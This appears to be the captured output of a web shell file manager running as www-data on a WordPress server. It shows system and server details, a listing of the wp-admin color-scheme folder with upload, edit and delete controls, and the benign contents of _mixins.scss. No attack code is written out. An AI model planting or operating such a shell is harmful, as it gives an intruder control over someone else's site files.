[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-admin
/
css
/
colors
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 blue
SET
[ DEL ]
📁 coffee
SET
[ DEL ]
📁 ectoplasm
SET
[ DEL ]
📁 light
SET
[ DEL ]
📁 midnight
SET
[ DEL ]
📁 modern
SET
[ DEL ]
📁 ocean
SET
[ DEL ]
📁 sunrise
SET
[ DEL ]
📄 _admin.scss
23,026 B
SET
[ EDIT ]
|
[ DEL ]
📄 _mixins.scss
945 B
SET
[ EDIT ]
|
[ DEL ]
📄 _variables.scss
2,571 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: _mixins.scss
@use 'sass:color'; /* * Button mixin- creates a button effect with correct * highlights/shadows, based on a base color. */ @mixin button( $button-color, $button-text-color: #fff ) { background: $button-color; border-color: $button-color; color: $button-text-color; &:hover, &:focus { background: color.adjust($button-color, $lightness: 3%); border-color: color.adjust($button-color, $lightness: -3%); color: $button-text-color; } &:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px $button-color; } &:active { background: color.adjust($button-color, $lightness: -5%); border-color: color.adjust($button-color, $lightness: -5%); color: $button-text-color; } &.active, &.active:focus, &.active:hover { background: $button-color; color: $button-text-color; border-color: color.adjust($button-color, $lightness: -15%); box-shadow: inset 0 2px 5px -3px color.adjust($button-color, $lightness: -50%); } }